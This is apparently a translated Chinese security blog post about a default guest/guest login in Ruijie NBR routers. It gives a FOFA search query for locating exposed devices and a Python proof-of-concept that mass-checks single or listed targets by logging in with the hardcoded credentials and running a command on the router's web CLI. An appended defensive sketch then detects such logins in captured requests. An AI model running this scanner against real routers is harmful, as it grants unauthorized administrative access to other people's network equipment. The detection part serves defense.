Ruijie NBR Router Weak Password Vulnerability

劉一手 鵬組安全

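Vulnerability Overview

Ruijie Networks Co., Ltd. is a data communication solutions provider.
Ruijie's NBR routers have a weak password vulnerability that an attacker can use to obtain sensitive information.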

Affected Products

NBR routers

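Reproduction

A Baidu search shows that the default account and password for NBR routers is guest/guest.

Logging in to the NBR admin interface with the default account and password succeeds.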

poc

import sys
import argparse

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress the certificate warnings caused by verify=False
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def lemonlove7():
    # Print usage
    print('FOFA:title="銳捷網絡--NBR路由器--登錄界面"')
    print('python xxx.py -u/--url xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file xxx.txt')
    print('lemonlove7')


if len(sys.argv) == 1:
    lemonlove7()
    sys.exit()

par = argparse.ArgumentParser(description='lemonlove7 help')
par.add_argument('-u', '--url', help='輸入url', default='')
par.add_argument('-f', '--file', help='輸入文件', default='')
a = par.parse_args()

url = a.url
file = a.file

# The Authorization header and the auth cookie both carry base64("guest:guest")
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type': 'text/plain;charset=UTF-8',
    'Cookie': 'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest',
    'Authorization': 'Basic Z3Vlc3Q6Z3Vlc3Q='
}

# Harmless read-only command sent to the web CLI
data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.'

# Single-target check
if url != '':
    url2 = url
    try:
        url1 = url + '/WEB_VMS/LEVEL15/'
        r = requests.post(url=url1, data=data, headers=headers, verify=False, timeout=10)
        # print(r.text)
        if r.status_code == 200 and 'WebCLI' in r.text:
            print(url2 + 'NBR路由器存在弱口令:guest/guest')
        else:
            print(url2 + 'NBR路由器不存在弱口令')
    except Exception:
        print(url2 + '異常')

# Batch check: one URL per line in the input file
if file != '':
    with open(file, 'r') as p:
        for i in p.readlines():
            url = i.strip()
            # Prefix strings are empty as given here, so this branch never runs;
            # each line in the file must already include its scheme.
            if url.startswith('') != 1 and url.startswith('') != 1:
                url = '' + url
            url1 = url
            # print(url)
            try:
                url = url + '/WEB_VMS/LEVEL15/'
                r = requests.post(url=url, headers=headers, data=data, verify=False, timeout=10)
                if r.status_code == 200 and 'WebCLI' in r.text:
                    print(url1 + 'NBR路由器存在弱口令:guest/guest')
                else:
                    print(url1 + 'NBR路由器不存在弱口令')
            except Exception:
                print(url1 + '異常')

[Screenshots of the script's output: single-target check and batch check]
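For defenders, the request the PoC sends has a recognisable shape: a request to /WEB_VMS/LEVEL15/ whose Authorization header or auth cookie decodes to guest:guest. The following detection sketch is an added example, not code from the original post; it assumes requests are available as raw text (for instance from a proxy or packet capture), and the function names, the router.example host and the sample requests are constructed for illustration.

```python
import base64
from urllib.parse import unquote

DEFAULT_CREDS = {"guest:guest"}   # default account named on this page
CLI_PATH = "/WEB_VMS/LEVEL15/"    # endpoint the PoC posts to

def decode_b64(token):
    """Decode a (possibly URL-encoded) base64 credential; None if malformed."""
    try:
        return base64.b64decode(unquote(token), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def credentials_in_request(raw_request):
    """Collect user:password strings from the Authorization header and auth cookie."""
    found = set()
    for line in raw_request.splitlines()[1:]:
        if not line:                      # blank line: headers end, body follows
            break
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "authorization" and value.lower().startswith("basic "):
            found.add(decode_b64(value[6:].strip()))
        elif name == "cookie":
            for part in value.split(";"):
                key, _, val = part.strip().partition("=")
                if key == "auth" and val:
                    found.add(decode_b64(val))
    found.discard(None)
    return found

def is_default_login(raw_request):
    """True when a request to the web CLI path carries a default credential."""
    lines = raw_request.splitlines()
    parts = lines[0].split() if lines else []
    if len(parts) < 2 or not parts[1].startswith(CLI_PATH):
        return False
    return bool(credentials_in_request(raw_request) & DEFAULT_CREDS)

# Constructed sample requests (not captured traffic); router.example is a placeholder.
SAMPLES = [
    "POST /WEB_VMS/LEVEL15/ HTTP/1.1\r\nHost: router.example\r\n"
    "Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\r\n\r\ncommand=show clock",
    "POST /WEB_VMS/LEVEL15/ HTTP/1.1\r\nHost: router.example\r\n"
    "Cookie: hardtype=NBR2000G; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest\r\n\r\n",
    "POST /WEB_VMS/LEVEL15/ HTTP/1.1\r\nHost: router.example\r\n"
    "Authorization: Basic b3BzOmxvbmctcmFuZG9t\r\n\r\n",
]

if __name__ == "__main__":
    for request in SAMPLES:
        print(request.splitlines()[0], "->", is_default_login(request))
```

Any hit on a device you operate means the guest account still has its default password and should be changed or disabled.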


